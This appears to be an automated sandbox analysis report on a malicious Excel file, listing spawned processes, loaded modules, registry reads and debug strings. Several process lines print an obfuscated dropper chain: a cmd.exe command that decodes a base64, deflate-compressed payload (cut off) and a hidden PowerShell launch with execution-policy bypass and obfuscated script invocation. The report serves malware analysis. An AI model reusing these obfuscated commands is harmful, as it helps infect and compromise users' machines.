Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..V.........l...w...X>A.8...A.Xw................a.Xw..0.....D...............................w.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...w.....A.x...A.Xw................a.Xw..0.....D...............................w.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..V.........l.......X>A.8...A.Xw................a.Xw..0.....D.........................................V.f.....Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l.........A.x...A.Xw................a.Xw..0.....D.................................................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l....... .A.8...A.Xw................a.Xw..0.....D...........<...........................t.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l.........A.x...A.Xw................a.Xw..0.....D...........W.....................................Ww........

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp' 'c:\Users\user\AppData\Local\Temp\CSCAD75.tmp'
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3552.tmp'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3553.tmp'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp' 'c:\Users\user\AppData\Local\Temp\CSCAD75.tmp'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3552.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3553.tmp'

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbxxK3 source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp
Source:	Binary string: Qkc:\Users\user\AppData\Local\Temp\ua6j8io5.pdb source: csc.exe, 00000005.00000002.1650949937.019BD000.00000004.sdmp
Source:	Binary string: System.Management.Automation.pdbn Files\Oracle;;~3 source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source:	Binary string: tion.pdbL source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source:	Binary string: rlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.1674343739.019B0000.00000002.sdmp, powershell.exe, 00000009.00000002.1780905680.03FA0000.00000002.sdmp
Source:	Binary string: Display this usage messageSSpecify debug information file name (default: output file name with .pdb extension)5### Visual C# 2005 Compiler Defect Report, created %s source: csc.exe, 00000005.00000002.1650835635.00360000.00000002.sdmp
Source:	Binary string: mscorlib.pdbKK13 source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp
Source:	Binary string: l\Temp\ua6j8io5.pdb18e3b_8.0.50727.4940_none_d08cc06a442b34 source: csc.exe, 00000005.00000002.1650699682.00209000.00000004.sdmp
Source:	Binary string: wPkc:\Users\user\AppData\Local\Temp\ua6j8io5.pdb source: csc.exe, 00000005.00000003.1645423451.0032C000.00000004.sdmp
Source:	Binary string: mscorlib.pdbjjfu source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp
Source:	Binary string: indows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb=. source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1777244667.01BB8000.00000004.sdmp
Source:	Binary string: c:\Users\user\AppData\Local\Temp\ua6j8io5.pdb source: powershell.exe, 00000004.00000002.1679049173.04370000.00000004.sdmp, csc.exe, 00000005.00000003.1647057868.00232000.00000004.sdmp
Source:	Binary string: c:\Users\user\AppData\Local\Temp\3ndkwphw.pdb source: powershell.exe, 00000009.00000002.1781647232.04430000.00000004.sdmp
Source:	Binary string: /C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllty Config\v2.0.50727.312\security.config.cch.4060.729296nagement.Automation.pdbs\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\Syste source: powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbe source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source:	Binary string: l\Temp\ua6j8io5.pdb18e3b_8.0.50727.4940_none_d08cc06a442b34& source: csc.exe, 00000005.00000003.1647115077.00209000.00000004.sdmp
Source:	Binary string: indows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
